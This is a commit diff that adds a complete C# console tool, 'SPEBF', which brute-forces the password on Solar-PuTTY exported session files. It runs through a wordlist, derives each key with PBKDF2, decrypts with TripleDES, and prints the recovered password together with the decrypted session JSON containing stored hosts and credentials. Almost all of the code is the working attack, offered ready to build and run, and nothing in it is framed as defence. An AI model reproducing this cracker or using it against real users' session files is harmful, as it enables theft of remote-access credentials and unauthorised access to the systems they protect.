Add project files

SolarPuttyEncryptionBruteforcer.sln

@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.11.35312.102
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SolarPuttyEncryptionBruteforcer", "SolarPuttyEncryptionBruteforcer\SolarPuttyEncryptionBruteforcer.csproj", "{68A8D8C8-069E-4DC6-B35E-8838C68258C4}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{68A8D8C8-069E-4DC6-B35E-8838C68258C4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{68A8D8C8-069E-4DC6-B35E-8838C68258C4}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{68A8D8C8-069E-4DC6-B35E-8838C68258C4}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{68A8D8C8-069E-4DC6-B35E-8838C68258C4}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {371CC056-1E04-43A5-B0A8-5BA41C1C7268}
+	EndGlobalSection
+EndGlobal

SolarPuttyEncryptionBruteforcer/Program.cs

@@ -0,0 +1,104 @@
+using Newtonsoft.Json;
+using System.Security.Cryptography;
+using Formatting = Newtonsoft.Json.Formatting;
+
+namespace SolarPuttyEncryptionBruteforcer
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            string password;
+
+            Console.ForegroundColor = ConsoleColor.Cyan;
+            Console.WriteLine("\n\t~= SPEBF by B1TC0R3 =~\n");
+            Console.ResetColor();
+
+            if (args.Length != 2)
+            {
+                Console.WriteLine("Usage: .\\spebf.exe C:\\session.dat C:\\wordlist.txt");
+                Environment.Exit(0);
+            }
+
+            Console.Write("[+] Attempting to recover password for ");
+            Console.ForegroundColor = ConsoleColor.Green;
+            Console.WriteLine(args[0]);
+            Console.ResetColor();
+
+            foreach (var line in File.ReadLines(args[1]))
+            {
+                password = line.Replace("\n", "");
+
+                if (password.Length == 0)
+                    continue;
+
+                try
+                {
+                    if (DoImport(args[0], password))
+                    {
+                        Console.Write("[+] Password: ");
+                        Console.ForegroundColor = ConsoleColor.Green;
+                        Console.WriteLine(password + "\n");
+                        Console.ResetColor();
+                        Environment.Exit(0);
+                    }
+
+                }
+                catch { }
+
+            }
+
+            Console.ForegroundColor = ConsoleColor.Red;
+            Console.WriteLine("[-] Failed to find password.");
+            Console.ResetColor();
+        }
+        static bool DoImport(string dialogFileName, string password)
+        {
+            using FileStream fileStream = new(dialogFileName, FileMode.Open);
+            using StreamReader streamReader = new(fileStream);
+            string data = streamReader.ReadToEnd();
+
+            var decryption_result = Decrypt(password, data);
+
+            if (decryption_result == string.Empty)
+                return false;
+
+           var json = JsonConvert.DeserializeObject(decryption_result);
+           var cleaned_json = JsonConvert.SerializeObject(json, Formatting.Indented);
+           Console.WriteLine("\n" + cleaned_json + "\n");
+
+           return true;
+        }
+
+        public static string Decrypt(string passPhrase, string cipherText)
+        {
+            string result = "";
+
+            byte[] raw_data = Convert.FromBase64String(cipherText);
+            byte[] salt = raw_data.Take(24).ToArray();
+            byte[] rgbIV = raw_data.Skip(24).Take(24).ToArray();
+            byte[] payload = raw_data.Skip(48).Take(raw_data.Length - 48).ToArray();
+
+            using Rfc2898DeriveBytes rfc2898DeriveBytes = new(passPhrase, salt, 1000);
+            byte[] bytes = rfc2898DeriveBytes.GetBytes(24);
+
+            using TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new();
+            tripleDESCryptoServiceProvider.Mode = CipherMode.CBC;
+            tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7;
+
+            using ICryptoTransform transform = tripleDESCryptoServiceProvider.CreateDecryptor(bytes, rgbIV);
+            using MemoryStream memoryStream = new(payload);
+            using CryptoStream cryptoStream = new(memoryStream, transform, CryptoStreamMode.Read);
+
+            for (int current = 0; current != -1; current = cryptoStream.ReadByte())
+            {
+                result += (char)current;
+            }
+
+            memoryStream.Close();
+            cryptoStream.Close();
+
+            return result;
+        }
+    }
+}

SolarPuttyEncryptionBruteforcer/SolarPuttyEncryptionBruteforcer.csproj

@@ -0,0 +1,15 @@
+<Project Sdk="Microsoft.NET.Sdk">
+
+  <PropertyGroup>
+    <OutputType>Exe</OutputType>
+    <TargetFramework>net8.0</TargetFramework>
+    <ImplicitUsings>enable</ImplicitUsings>
+    <Nullable>enable</Nullable>
+    <AssemblyName>spebf</AssemblyName>
+  </PropertyGroup>
+
+  <ItemGroup>
+    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
+  </ItemGroup>
+
+</Project>